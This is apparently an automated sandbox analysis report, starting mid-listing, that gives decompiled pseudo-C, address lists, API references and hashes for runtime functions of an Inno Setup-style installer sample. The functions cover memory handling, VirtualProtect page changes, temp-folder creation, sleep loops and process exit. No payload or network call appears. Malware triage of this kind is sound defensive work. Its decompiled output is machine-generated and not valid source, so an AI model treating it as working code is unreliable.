								 *((intOrPtr*)(__esi + 0xc)) = 1;
								 *(__ebx + 0x10) = __esi;
								_t61 = __esi + 0x20; // 0x2585630
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 8) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0xc) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0xc;
							 *_t19 =  *(__edx + 0xc) + 1;
							__eflags =  *_t19;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0xc) =  *(__edx + 0xc) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 4);
							 *(__ecx + 0x14) = __ebx;
							 *(__ebx + 4) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

0x00401904
0x0040190a
0x00401b58
0x00401b5d
0x00401c70
0x00401c71
0x00401c73
0x004016a4
0x004016a8
0x004016b4
0x004016c4
0x004016c9
0x004016cd
0x004016cf
0x004016d1
0x004016d7
0x004016da
0x004016df
0x004016e4
0x004016ea
0x004016f0
0x004016f3
0x004016f5
0x004016fc
0x004016fc
0x00401705
0x00401c79
0x00401c79
0x00401c7b
0x00401c7b
0x00401b63
0x00401b6f
0x00401b72
0x00401b74
0x00401b1c
0x00401b21
0x00401b29
0x00000000
0x00000000
0x00401b2b
0x00401b2d
0x00401b34
0x00000000
0x00401b36
0x00401b38
0x00401b42
0x00401b4a
0x00401b4e
0x00000000
0x00401b4e
0x00401b4a
0x00000000
0x00401b34
0x00401b1c
0x00401b76
0x00401b76
0x00401b7e
0x00401b81
0x00401b8b
0x00401b8b
0x00401b92
0x00401ba5
0x00401ba9
0x00401baf
0x00401bc8
0x00401bce
0x00401bce
0x00401bd0
0x00401bee
0x00401bd2
0x00401bd2
0x00401bd7
0x00401bd9
0x00401bde
0x00401be7
0x00401be7
0x00401bf3
0x00401bfb
0x00401bb1
0x00401bb1
0x00401bbb
0x00401bc3
0x00000000
0x00401bc3
0x00401b94
0x00401b97
0x00401b9a
0x00401bfc
0x00401bfc
0x00401bfd
0x00401bfe
0x00401c05
0x00401c08
0x00401c0b
0x00401c0e
0x00401c10
0x00401c12
0x00401c19
0x00401c1b
0x00401c1b
0x00401c1b
0x00401c22
0x00401c24
0x00401c24
0x00401c22
0x00401c30
0x00401c35
0x00401c35
0x00401c37
0x00401c58
0x00401c58
0x00401c58
0x00401c39
0x00401c39
0x00401c3f
0x00401c42
0x00401c46
0x00401c4c
0x00401c4e
0x00401c4e
0x00401c4c
0x00401c60
0x00401c63
0x00401c6f
0x00401c6f
0x00401b92
0x00401910
0x00401910
0x00401912
0x00401919
0x00401920
0x00401978
0x00401978
0x0040197d
0x00401981
0x00000000
0x00000000
0x00401983
0x00401983
0x00401986
0x0040198b
0x0040198f
0x00401991
0x00401991
0x00401994
0x00401999
0x0040199d
0x0040199f
0x004019a2
0x004019a4
0x004019ab
0x00000000
0x004019ad
0x004019af
0x004019b4
0x004019b9
0x004019bd
0x004019c5
0x00000000
0x004019c5
0x004019bd
0x004019ab
0x0040199d
0x00000000
0x0040198f
0x00401978
0x00401922
0x00401922
0x00401925
0x00401928
0x0040192d
0x0040192f
0x00401948
0x0040194b
0x0040194f
0x00401951
0x00401954
0x004019cc
0x004019cd
0x004019ce
0x004019d5
0x004019d7
0x004019d7
0x004019dc
0x004019e4
0x00000000
0x00000000
0x004019e6
0x004019e8
0x004019ef
0x00000000
0x004019f1
0x004019f3
0x004019f8
0x004019fd
0x00401a05
0x00401a09
0x00000000
0x00401a09
0x00401a05
0x00000000
0x004019ef
0x004019d7
0x00401a10
0x00401a14
0x00401a14
0x00401a1a
0x00401a8c
0x00401a90
0x00401a96
0x00401a98
0x00401ac0
0x00401ac4
0x00401ac6
0x00401acb
0x00401acd
0x00401acf
0x00000000
0x00401ad1
0x00401ad1
0x00401ad6
0x00401ad8
0x00401ad9
0x00401ada
0x00401adb
0x00401adb
0x00401a9a
0x00401a9a
0x00401aa0
0x00401aa4
0x00401aaa
0x00401aac
0x00401aae
0x00401aae
0x00401ab0
0x00401ab2
0x00401ab8
0x00000000
0x00401ab8
0x00401a1c
0x00401a1c
0x00401a1f
0x00401a26
0x00401a2d
0x00401a30
0x00401a33
0x00401a3a
0x00401a3d
0x00401a40
0x00401a43
0x00401a45
0x00401a47
0x00401a49
0x00401a4e
0x00401a50
0x00401a50
0x00401a50
0x00401a57
0x00401a59
0x00401a59
0x00401a57
0x00401a60
0x00401a65
0x00401a68
0x00401a6e
0x00401adc
0x00401adc
0x00401adc
0x00401a70
0x00401a70
0x00401a72
0x00401a76
0x00401a78
0x00401a7b
0x00401a7e
0x00401a81
0x00401a85
0x00401a85
0x00401ae1
0x00401ae1
0x00401ae1
0x00401ae4
0x00401ae7
0x00401ae9
0x00401aee
0x00401af0
0x00401af3
0x00401afa
0x00401afd
0x00401afd
0x00401b00
0x00401b04
0x00401b07
0x00401b0a
0x00401b0c
0x00401b0c
0x00401b0e
0x00401b11
0x00401b14
0x00401b17
0x00401b18
0x00401b19
0x00401b1a
0x00401b1a
0x00401956
0x00401956
0x00401956
0x00401956
0x0040195a
0x0040195d
0x00401960
0x00401963
0x00401964
0x00401964
0x00401931
0x00401931
0x00401935
0x00401935
0x00401938
0x0040193b
0x0040193e
0x00401968
0x0040196b
0x0040196e
0x00401971
0x00401974
0x00401975
0x00401940
0x00401940
0x00401943
0x00401944
0x00401944
0x0040193e
0x0040192f

APIs

Sleep.KERNEL32(00000000,?,004018C6), ref: 004019AF
Sleep.KERNEL32(0000000A,00000000,?,004018C6), ref: 004019C5
Sleep.KERNEL32(00000000,?,?,?,004018C6), ref: 004019F3
Sleep.KERNEL32(0000000A,00000000,?,?,?,004018C6), ref: 00401A09

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f51487f3f1496f02d5e4cf641ff69e07689fa8231a26707e284f0f573df8b7fc
Instruction ID: 0cef76587b77e40ce70905fbd12d0a83284de57665f5d39768faeb799c530d07
Opcode Fuzzy Hash: f51487f3f1496f02d5e4cf641ff69e07689fa8231a26707e284f0f573df8b7fc
Instruction Fuzzy Hash: A0C125726012508BCB15CF29D980796BBE0AF85351F18C2BFE485AB3E5D778A941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED40, Relevance: 7.6, APIs: 5, Instructions: 80
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ED40(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				char _v88;
				long _t22;
				int _t28;
				void* _t37;
				struct _MEMORY_BASIC_INFORMATION* _t40;
				long _t41;
				void** _t42;

				_t42 =  &(_v80.dwPageSize);
				 *_t42 = __eax;
				_t40 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
				if(_t22 == 0) {
					L17:
					return _t22;
				} else {
					while(1) {
						_t22 = _t40->AllocationBase;
						if(_t22 !=  *_t42) {
							goto L17;
						}
						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
							L15:
							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
							if(_t22 == 0) {
								goto L17;
							}
							continue;
						} else {
							_v88 = 0;
							_t41 = _t40->Protect;
							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
								if(_t28 != 0) {
									_v88 = 1;
								}
							}
							_t37 = 0;
							while(_t37 < _t40->RegionSize) {
								E0040ED38(_t40->BaseAddress + _t37);
								_t37 = _t37 + _v80.dwPageSize;
							}
							if(_v88 != 0) {
								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}

0x0040ed44
0x0040ed47
0x0040ed4a
0x0040ed53
0x0040ed5f
0x0040ed66
0x0040ee12
0x0040ee12
0x0040ed6c
0x0040edff
0x0040edff
0x0040ee05
0x00000000
0x00000000
0x0040ed78
0x0040edeb
0x0040edf6
0x0040edfd
0x00000000
0x00000000
0x00000000
0x0040ed80
0x0040ed80
0x0040ed85
0x0040ed8b
0x0040edaa
0x0040edb1
0x0040edb3
0x0040edb3
0x0040edb1
0x0040edb8
0x0040edc9
0x0040edc0
0x0040edc5
0x0040edc5
0x0040edd3
0x0040ede6
0x0040ede6
0x00000000
0x0040edd3
0x0040ed78
0x00000000
0x0040edff

APIs

GetSystemInfo.KERNEL32(?), ref: 0040ED53
VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 0040ED5F
VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 0040EDAA
VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 0040EDE6
VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 0040EDF6

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: 2fc8043b29857472b58c255470cfcfd6539f48e52088e031203312cf8912bc76
Instruction ID: 4b5512479451d82684af30c3e99dc27f9476853229ddccfc2b98e30e16071c48
Opcode Fuzzy Hash: 2fc8043b29857472b58c255470cfcfd6539f48e52088e031203312cf8912bc76
Instruction Fuzzy Hash: 7B217C71104305AED730EA66C884EABB7E8EF45310F048C2EF585A32C1D339E864CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0040E414, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040E414(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x40e509);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E0040B9FC( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E0040E2F8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E00404D24(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						_push( &_v16);
						E0040DF20(0x36,  &_v32, _v8);
						_v28 = _v32;
						E00407EE8( &_v36, _t54);
						_v24 = _v36;
						E0040BF84(_t54,  &_v40);
						_v20 = _v40;
						E0040DEF0(0x68, 2,  &_v28, 0);
						_t55 = _v16;
						E00409824(_v16, 1);
						E00403F88();
					}
				}
				E00404C98(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E0040E510);
				L00404C90( &_v40, 3);
				return L00404C90( &_v16, 3);
			}

0x0040e414
0x0040e414
0x0040e415
0x0040e417
0x0040e41c
0x0040e41c
0x0040e41e
0x0040e420
0x0040e420
0x0040e423
0x0040e424
0x0040e426
0x0040e428
0x0040e42a
0x0040e42b
0x0040e430
0x0040e433
0x0040e436
0x0040e43d
0x0040e445
0x0040e44c
0x0040e45c
0x0040e463
0x00000000
0x00000000
0x0040e46a
0x0040e46c
0x0040e472
0x0040e477
0x0040e480
0x0040e488
0x0040e494
0x0040e49c
0x0040e4a4
0x0040e4ac
0x0040e4b9
0x0040e4be
0x0040e4c8
0x0040e4cd
0x0040e4cd
0x0040e472
0x0040e4dc
0x0040e4e1
0x0040e4e3
0x0040e4e6
0x0040e4e9
0x0040e4f6
0x0040e508

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0040E509,?,?,?,00000003,00000000,00000000,?,00411A7D), ref: 0040E45C
GetLastError.KERNEL32(00000000,00000000,?,00000000,0040E509,?,?,?,00000003,00000000,00000000,?,00411A7D), ref: 0040E465

Strings

.tmp, xrefs: 0040E445

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 7edbd8eb8868f647336dcda8a82f97366c033c536537bd7bc5c9f0c834e51e1f
Instruction ID: 0fa68b6a66232beb2f5cf3e2a8c7cb538fd8d08fdd35de0873b47ece01a66cb4
Opcode Fuzzy Hash: 7edbd8eb8868f647336dcda8a82f97366c033c536537bd7bc5c9f0c834e51e1f
Instruction Fuzzy Hash: 04218B75A00109ABDB14EFE5CC41ADEB3F9EB88304F51457BF901B73C1DA389E008AA8

Uniqueness

Uniqueness Score: -1.00%

Function 004068EC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004068EC(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00403110();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00403100(_t13);
				return _t24;
			}

0x004068f3
0x004068f8
0x004068fa
0x0040692b
0x00406934
0x00406940

APIs

CreateWindowExW.USER32 ref: 0040692B

Strings

InnoSetupLdrWindow, xrefs: 004068EF
STATIC, xrefs: 00406929

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID: InnoSetupLdrWindow$STATIC
API String ID: 716092398-2209255943
Opcode ID: c0992d5dae7087bb7648db7e278b48ea95b6fe98ae32dfbc74ce53748ec999af
Instruction ID: 6351ba77ad7f294675345a051ebbfaa16a65daa534f29d3811ce1de3ec6cb91b
Opcode Fuzzy Hash: c0992d5dae7087bb7648db7e278b48ea95b6fe98ae32dfbc74ce53748ec999af
Instruction Fuzzy Hash: E3F092B2600118BF8B80DE9DDC81EDB7BECEB4C264B05412AFA0CE7201D634ED108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5DC, Relevance: 5.0, APIs: 4, Instructions: 45
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E5DC(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E0040E168(_t9, _v8, _t19); // executed
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}

0x0040e5dc
0x0040e5e3
0x0040e5e6
0x0040e5ea
0x0040e5ed
0x0040e63b
0x0040e63b
0x0040e63b
0x0040e5ef
0x0040e5f0
0x0040e5f2
0x0040e5f2
0x0040e5f5
0x0040e602
0x0040e605
0x0040e60b
0x0040e60b
0x0040e5f7
0x0040e5fb
0x0040e5fb
0x0040e615
0x0040e61c
0x00000000
0x00000000
0x0040e61e
0x0040e626
0x00000000
0x00000000
0x0040e628
0x0040e630
0x00000000
0x00000000
0x0040e632
0x0040e633
0x0040e634
0x00000000
0x00000000
0x00000000
0x0040e634
0x00000000

APIs

Sleep.KERNEL32(?,?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E5FB
Sleep.KERNEL32(?,?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E60B
GetLastError.KERNEL32(?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E61E
GetLastError.KERNEL32(?,?,?,0000000D,?,00411DC8,000000FA,00000032,00411E30), ref: 0040E628

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: aac2bbf36f8ddde83f6facb60647697f5e410134289920da196e8a7cad57603d
Instruction ID: 94192f546389ca7677f92084570e97d6a590b5d124bd5d39fde150768ecb5d8c
Opcode Fuzzy Hash: aac2bbf36f8ddde83f6facb60647697f5e410134289920da196e8a7cad57603d
Instruction Fuzzy Hash: 22F02B3260012467DB30E5BFEC8591F7258DAA13687104C3BF505F3381D43ADD6142A9

Uniqueness

Uniqueness Score: -1.00%

Function 00404580, Relevance: 4.6, APIs: 3, Instructions: 92
threadCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00404580() {
				void* _t14;
				int _t21;
				void* _t33;
				void* _t47;
				struct HINSTANCE__* _t54;
				void* _t58;

				if( *0x412004 != 0) {
					E00404458();
					E004044F0(_t47);
					 *0x412004 = 0;
				}
				if( *0x415b18 != 0 && GetCurrentThreadId() ==  *0x415b40) {
					E004041DC(0x415b14);
					E004044C4(0x415b14);
				}
				if( *0x00415B0C != 0 ||  *0x413048 == 0) {
					L8:
					if( *((char*)(0x415b0c)) == 2 &&  *0x412000 == 0) {
						 *0x00415AF0 = 0;
					}
					_t14 = E00402EC8();
					_t45 = _t14;
					if(_t14 == 0) {
						L13:
						E00404204(); // executed
						if( *((char*)(0x415b0c)) <= 1 ||  *0x412000 != 0) {
							_t57 =  *0x00415AF4;
							if( *0x00415AF4 != 0) {
								E00406204(_t57);
								_t7 =  *((intOrPtr*)(0x415af4)) + 0x10; // 0x400000
								_t54 =  *_t7;
								_t9 =  *((intOrPtr*)(0x415af4)) + 4; // 0x400000
								if(_t54 !=  *_t9 && _t54 != 0) {
									FreeLibrary(_t54);
								}
							}
						}
						E004041DC(0x415ae4);
						if( *((char*)(0x415b0c)) == 1) {
							 *0x00415B08();
						}
						if( *((char*)(0x415b0c)) != 0) {
							E004044C4(0x415ae4);
						}
						if( *0x415ae4 == 0) {
							if( *0x41302c != 0) {
								 *0x41302c();
							}
							_t21 =  *0x412000; // 0x0
							ExitProcess(_t21); // executed
						}
						memcpy(0x415ae4,  *0x415ae4, 0xc << 2);
						_t58 = _t58 + 0xc;
						0x415ae4 = 0x415ae4;
						goto L8;
					} else {
						do {
							E00403894(_t45);
							_t33 = E00402EC8();
							_t45 = _t33;
						} while (_t33 != 0);
						goto L13;
					}
				} else {
					do {
						 *0x413048 = 0;
						 *((intOrPtr*)( *0x413048))();
					} while ( *0x413048 != 0);
					L8:
					while(1) {
					}
				}
			}

0x00404595
0x00404597
0x0040459c
0x004045a3
0x004045a3
0x004045af
0x004045c3
0x004045cd
0x004045cd
0x004045d6
0x004045ec
0x004045f0
0x004045fd
0x004045fd
0x00404600
0x00404605
0x00404609
0x0040461d
0x0040461d
0x00404626
0x00404631
0x00404636
0x0040463a
0x00404642
0x00404642
0x00404648
0x0040464b
0x00404652
0x00404652
0x0040464b
0x00404636
0x00404659
0x00404662
0x00404664
0x00404664
0x0040466b
0x0040466f
0x0040466f
0x00404677
0x00404680
0x00404682
0x00404682
0x00404688
0x0040468e
0x0040468e
0x0040469f
0x0040469f
0x004046a1
0x00000000
0x0040460b
0x0040460b
0x0040460d
0x00404612
0x00404617
0x00404619
0x00000000
0x0040460b
0x004045dd
0x004045dd
0x004045e3
0x004045e5
0x004045e7
0x00000000
0x004045ec
0x00000000
0x004045ec

APIs

GetCurrentThreadId.KERNEL32 ref: 004045B1
FreeLibrary.KERNEL32(00400000,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000,?,?,?,00000000,0040B7F4,00000000,0040B83D), ref: 00404652
ExitProcess.KERNEL32(00000000,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000,?,?,?,00000000,0040B7F4,00000000,0040B83D), ref: 0040468E

Part of subcall function 004044F0: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000,?), ref: 00404529
Part of subcall function 004044F0: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000), ref: 0040452F
Part of subcall function 004044F0: GetStdHandle.KERNEL32(000000F5,0040457C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?), ref: 00404544
Part of subcall function 004044F0: WriteFile.KERNEL32(00000000,000000F5,0040457C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?), ref: 0040454A

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.400650229.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400673104.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400684729.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.400696803.000000000041C000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.400710663.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID:
API String ID: 3490077880-0
Opcode ID: 4356c6b92ebc9da1c518ca1677b44757bab9836aa0f193545dcf1a51ed26351d
Instruction ID: 4d782e4c625b569beac7369a61e92c8a12ca43a803c998872a7a01d6faed15f3
Opcode Fuzzy Hash: 4356c6b92ebc9da1c518ca1677b44757bab9836aa0f193545dcf1a51ed26351d
Instruction Fuzzy Hash: 8131A0B06006408BDB31BBB9984875776D4AB99309F14493FE745A72D2E7BDE880CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00404578, Relevance: 4.6, APIs: 3, Instructions: 87
threadCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00404578() {
				intOrPtr* _t14;
				void* _t17;
				int _t24;
				void* _t36;
				void* _t51;
				struct HINSTANCE__* _t59;
				void* _t65;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x412004 != 0) {
					E00404458();
					E004044F0(_t51);
					 *0x412004 = 0;
				}
				if( *0x415b18 != 0 && GetCurrentThreadId() ==  *0x415b40) {
					E004041DC(0x415b14);
					E004044C4(0x415b14);
				}
				if( *0x00415B0C != 0 ||  *0x413048 == 0) {
					L10:
					if( *((char*)(0x415b0c)) == 2 &&  *0x412000 == 0) {
						 *0x00415AF0 = 0;
					}
					_t17 = E00402EC8();
					_t49 = _t17;
					if(_t17 == 0) {
						L15:
						E00404204(); // executed
						if( *((char*)(0x415b0c)) <= 1 ||  *0x412000 != 0) {
							_t64 =  *0x00415AF4;
							if( *0x00415AF4 != 0) {
								E00406204(_t64);
								_t7 =  *((intOrPtr*)(0x415af4)) + 0x10; // 0x400000
								_t59 =  *_t7;
								_t9 =  *((intOrPtr*)(0x415af4)) + 4; // 0x400000
								if(_t59 !=  *_t9 && _t59 != 0) {
									FreeLibrary(_t59);
								}
							}
						}
						E004041DC(0x415ae4);
						if( *((char*)(0x415b0c)) == 1) {
							 *0x00415B08();
						}
						if( *((char*)(0x415b0c)) != 0) {
							E004044C4(0x415ae4);
						}
						if( *0x415ae4 == 0) {
							if( *0x41302c != 0) {
								 *0x41302c();
							}
							_t24 =  *0x412000; // 0x0
							ExitProcess(_t24); // executed
						}
						memcpy(0x415ae4,  *0x415ae4, 0xc << 2);
						_t65 = _t65 + 0xc;
						0x415ae4 = 0x415ae4;
						goto L10;
					} else {
						do {
							E00403894(_t49);
							_t36 = E00402EC8();
							_t49 = _t36;
						} while (_t36 != 0);
						goto L15;
					}
				} else {
					do {
						 *0x413048 = 0;
						 *((intOrPtr*)( *0x413048))();
					} while ( *0x413048 != 0);
					L10:
					while(1) {
					}
				}
			}

0x0040457a
0x00404595
0x00404597
0x0040459c
0x004045a3
0x004045a3
0x004045af
0x004045c3
0x004045cd
0x004045cd
0x004045d6
0x004045ec
0x004045f0
0x004045fd
0x004045fd
0x00404600
0x00404605
0x00404609
0x0040461d
0x0040461d
0x00404626
0x00404631
0x00404636
0x0040463a
0x00404642
0x00404642
0x00404648
0x0040464b
0x00404652
0x00404652
0x0040464b
0x00404636
0x00404659
0x00404662
0x00404664
0x00404664
0x0040466b
0x0040466f
0x0040466f
0x00404677
0x00404680
0x00404682
0x00404682
0x00404688
0x0040468e
0x0040468e
0x0040469f
0x0040469f
0x004046a1
0x00000000
0x0040460b
0x0040460b
0x0040460d
0x00404612
0x00404617
0x00404619
0x00000000
0x0040460b
0x004045dd
0x004045dd
0x004045e3
0x004045e5
0x004045e7
0x00000000
0x004045ec
0x00000000
0x004045ec

APIs

GetCurrentThreadId.KERNEL32 ref: 004045B1
FreeLibrary.KERNEL32(00400000,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000,?,?,?,00000000,0040B7F4,00000000,0040B83D), ref: 00404652
ExitProcess.KERNEL32(00000000,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000,?,?,?,00000000,0040B7F4,00000000,0040B83D), ref: 0040468E

Part of subcall function 004044F0: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000,?), ref: 00404529
Part of subcall function 004044F0: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?,?,00000001,004046B6,00402F13,00402F5A,00000000), ref: 0040452F
Part of subcall function 004044F0: GetStdHandle.KERNEL32(000000F5,0040457C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?), ref: 00404544
Part of subcall function 004044F0: WriteFile.KERNEL32(00000000,000000F5,0040457C,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004045A1,?,?), ref: 0040454A

Memory Dump Source

Source File: 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

